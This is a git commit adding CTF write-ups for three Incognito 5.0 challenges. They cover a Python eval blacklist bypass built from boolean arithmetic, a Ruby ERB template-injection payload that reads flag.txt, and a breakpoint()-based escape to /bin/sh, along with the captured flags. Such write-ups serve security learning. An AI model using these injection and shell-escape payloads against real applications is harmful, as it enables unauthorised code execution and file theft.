feat: added incognito 5.0

2024-04-17 07:39:15 +07:00 · 2024-04-17 07:39:15 +07:00 · 0dbb29af50
parent 04bb2b032b
commit 0dbb29af50
12 changed files with 122 additions and 1 deletions
--- a/game/README.md
+++ b/game/README.md
@ -0,0 +1,54 @@
 # Doodle game
 > How good are you in python?
 ## About the Challenge
 We got a server to connect and also the source code. Here is the content of the website
 ```python
 #!/usr/bin/python
 import time
 import unicodedata
 blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789[]{}<>/_'!"
 def isSafe(cmd):
    for i in cmd:
        if i in blacklist:
            return(0)
    return(1)
 def main():
    cmd = input(">> ")
    normalized_cmd = unicodedata.normalize('NFKD', cmd).encode('ASCII', 'ignore').decode()
    if(isSafe(normalized_cmd)):
        try:
            if(eval(normalized_cmd) == 17592186044416):
                print(open("flag").readline())
            else:
                print(eval(normalized_cmd))
        except:
            print("An exception occurred")
    else:
        print("Not allowed!")
 main()
 ```
 So, this script takes user input, checks if it's safe by removing non-ASCII characters and those in a `blacklist` variable, then "eval"ing the input. If the evaluated result equals a `17592186044416` or 2^44, it will print the flag
 ## How to Solve?
 Because the goal of this challenge is to achieve `17592186044416`, you can use this payload:
 ```
 ((()==())+(()==()))**((()==())+(()==()))**((()==())+(()==()))**((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))*((()==())+(()==()))
 ```
 `() == ()` equals True. So, if there are `(() == ()) + (() == ())`, it means True + True equals 2, and then we can use the power operator (**) in python 44 times to achieve `17592186044416`
 ![flag](images/flag.png)
 ```
 ictf{L0nG_L1v3_7H3_B00L34N5}
 ```
--- a/2024/Incognito
+++ b/2024/Incognito
--- a/Flow/README.md
+++ b/Flow/README.md
@ -0,0 +1,32 @@
 # Embed Flow
 > This guy wants you to guess his favorite programming language, but missed setting up the pattern correctly.
 ## About the Challenge
 We got a website and this website is using Sinatara (Ruby). Here is the preview of the challenge
 ![preview](images/preview.png)
 If we try to input `'` character, we'll get an error message like this:
 ![testing-phase](images/testing-phase.png)
 ## How to Solve?
 After seeing the regex pattern, I immediately knew this was similar to a HTB challenge called `Neonify` (https://blog.devops.dev/ssti-bypass-filter-0-9a-z-i-08a5b3b98def). So I used the same payload to read the flag :D
 ```
 test
 <%= File.open('flag.txt').read %>
 test
 ```
 And then encode it using urlencode and it will become
 ```
 test%0A%3C%25=%20File.open('flag.txt').read%20%25%3E%0Atest
 ```
 ![flag](images/flag.png)
 ```
 ictf{ruby_r3g3x_n3w_l1n3_4l3rt}
 ```
--- a/Flow/images/flag.png
+++ b/Flow/images/flag.png
--- a/Flow/images/preview.png
+++ b/Flow/images/preview.png
--- a/Flow/images/testing-phase.png
+++ b/Flow/images/testing-phase.png
--- a/Tale/README.md
+++ b/Tale/README.md
@ -0,0 +1,26 @@
 # Fairy Tale
 > Type in your favorite hero and let Fairy Tale spin a unique story for you.
 ## About the Challenge
 We got a server to connect without a source. Here is the preview of the challenge
 ![preview](images/preview.png)
 If we try to input `'`, we'll get an error message like this:
 ![testing-phase](images/testing-phase.png)
 It seems like our input is being passed into the `ast.literal_eval()` function
 ## How to Solve?
 To solve this chall, im calling `breakpoint()` function and then call `/bin/sh` by importing `os` package
 ```
 ' + breakpoint() + '
 ```
 ![flag](images/flag.png)
 ```
 ictf{b3_C4r3full_1n_3rr0r5}
 ```
--- a/Tale/images/flag.png
+++ b/Tale/images/flag.png
--- a/Tale/images/preview.png
+++ b/Tale/images/preview.png
--- a/Tale/images/testing-phase.png
+++ b/Tale/images/testing-phase.png
--- a/2024/Incognito
+++ b/2024/Incognito
@ -0,0 +1,8 @@
 # Incognito 5.0
 CTF writeup for The Incognito 5.0. I took part in this CTF competition with the Heroes Cyber Security team and secured the 1st place out of 275 teams
 | Category | Challenge |
 | --- | --- |
 | Web | [Embed Flow](/2024/Incognito%205.0/Embed%20Flow/)
 | Misc | [Doodle game](/2024/Incognito%205.0/Doodle%20game/)
 | Misc | [Fairy Tale](/2024/Incognito%205.0/Fairy%20Tale/)
--- a/README.md
+++ b/README.md
@ -11,7 +11,8 @@ There are __553__ CTF writeups that have been made in this repository
 | Event Name | Team | Ranking |
 | ---------- | ---- | ------- |
-| Wayne State University - CTF24 | 1 |
+| Incognito 5.0 | Heroes Cyber Security | 1 |
 | Wayne State University - CTF24 | Heroes Cyber Security | 1 |
 | KnightCTF 2024 | Heroes Cyber Security | 1 |
 | DeconstruCT.F 2023 | aseng_fans_club | 1 |
 | The Odyssey CTF | aseng_fans_club | 1 |